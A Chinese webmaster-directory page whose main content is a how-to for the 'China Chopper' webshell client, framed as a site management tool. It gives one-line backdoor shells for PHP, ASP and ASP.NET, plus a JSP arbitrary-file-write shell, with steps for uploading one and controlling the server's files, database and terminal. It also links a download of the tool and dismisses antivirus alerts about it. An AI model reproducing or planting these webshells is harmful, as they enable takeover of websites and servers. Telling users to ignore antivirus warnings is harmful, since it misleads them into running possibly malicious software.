公告:发一发站长目录为广大站长提供免费收录网站服务,VIP会员每天提交网站30、文章30免审核,快审服务(10元/站),可联系客服发布。

点击这里在线咨询客服 点击这里在线咨询客服
新站提交
  • 网站:266
  • 待审:5
  • 小程序:19
  • 文章:4805
  • 会员:171

      中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。本文主要讲解一下中国菜刀的使用方法:
 
1.中国菜刀支持的服务端脚本:PHP、ASP;
2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。
3.菜刀的工作原理是:利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。
 
今天我只介绍PHP的方法(其他的大同小异)。
 
使用方法如下:
第一步:新建一个php文件,文件名随意取,然后写入一句代码:
<?php 
eval($_POST['ee']);
 ?>  ;
 
    eval()这个函数大家并不陌生吧,就是把里面的字符串作为PHP代码执行。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。
 
 
第二步:打开菜刀这个软件,进入如下界面,右键点击“添加”;如下图:
 
 
 
 
第三步:此时会弹出一个添加shell的对话框,由图一看出我的 “dxr.php”上传在站点根目录,所以这里的地址填为:http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”,也就是<?php eval($_POST['ee']); ?> 这里的“ee”。下面配置项如果你知道用户名密码就填,不知道,不填,也不会影响文件管理和虚拟终端这两个功能,只是不能查看数据库了。
 

 
最后:点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!!
 
   
 
所以很多黑站者利用一些网站漏洞,上传一句话木马后,就基本上可以黑下你的站了。中国菜刀,就是这么强大!!
 
操作效果截图:
 
  
 

另外在所有不同环境服务端运行的代码如下:
PHP:    <?php @eval($_POST['pass']);?>
ASP:    <%eval request(“pass”)%>
ASP.NET:    <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%> JSP:<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>(注意: ASP.NET要单独一个文件或此文件也是Jscript语言) 


 

菜刀2015下载:https://yunpan.cn/cqZDyIEc48zmp  访问密码 a5fd
 
最后说明一下:此软件打开时杀毒软件可能会报毒的,我已经用了很多遍,反正都没事。如果你不相信的话,也就不用下载了,呵呵。
 

本站推荐: 站长博客 网站导航 分类信息 发小妁交友 喜世界招商 分类导航 VIP电影

  yiluqufa

注册时间:

网站:1 个   小程序:3 个  文章:12 篇

  • 266

    网站

  • 19

    小程序

  • 4805

    文章

  • 171

    会员

赶快注册账号,推广您的网站吧!
热门网站
最新入驻小程序

北京实时公交出行2019-06-07

实时公交车线路查询小助手。公交

摩拜单车2019-06-07

扫码即可骑走的共享单车

人人车2019-06-03

人人车靠谱二手车

美团外卖2019-06-03

美团外卖,目前国内最大的外卖网上

京东购物2019-06-03

京东APP是一款多功能移动购物软

饿了么外卖服务2019-06-03

饿了就用饿了么!小程序版,更方便,微